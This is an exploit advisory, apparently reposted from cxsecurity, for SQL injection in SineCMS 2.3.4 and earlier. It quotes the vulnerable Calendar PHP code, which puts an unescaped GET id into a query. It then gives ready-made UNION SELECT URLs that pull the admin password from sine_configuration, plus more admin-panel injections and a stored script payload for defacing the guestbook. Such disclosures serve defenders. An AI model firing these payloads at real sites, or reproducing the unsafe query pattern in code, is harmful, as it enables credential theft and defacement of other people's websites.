SineCMS <= 2.3.4 Calendar SQL Injection 'n something else..

2007.12.16
Credit: KiNgOfThEwOrLd
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-6366 | CVE-2007-6367
CWE: CWE-89

--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- SineCMS <= 2.3.4 Calendar SQL Injection 'n something else.. --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- Notes: Only with magic_quotes_gpc -> Off --------------------------------------------------------------- Corrupted file: mods/Calendar/index.php --------------------------------------------------------------- Corrupted code: [...] function Evento ($sine){ if (!isset($_GET[id]) OR $_GET[id]=="") { header("Location: index.php"); } $query = "SELECT * FROM ".$sine[db][prefisso_tab]."calendario WHERE id='$_GET[id]'"; if ($_GET[id]){ $result = mysql_query($query, $sine[db][db]); $row = mysql_fetch_array($result); [...] --------------------------------------------------------------- Exploit: http://[target]/[sinecms_path]/mods.php?mods=Calendar&action=info&id='+u nion+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/* --------------------------------------------------------------- Something else.. There are a lots of useless sql injection in the admin panel, like... http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Guestbook&action= modifica&id='+union+select+1,2,3,4,password,6+from+sine_configuration/* http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&mese=11' +union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/* http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&action=m odify&id='+union+select+1,2,3,4,password,6,7,8,9+from+sine_configuration /* http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&anno='+u nion+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/* and much more.. --------------------------------------------------------------- There is also a permanent html injection in the guestbook, and i belive it can be considered so dangerous, coz the "last comments" module it's included in all the pages...then, an attacker can rewrite alle the pages posting a comment like <script>document.body.innerHTML="[Arbitrary_Code]";</script> in the "username" or "comment" field. ---------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top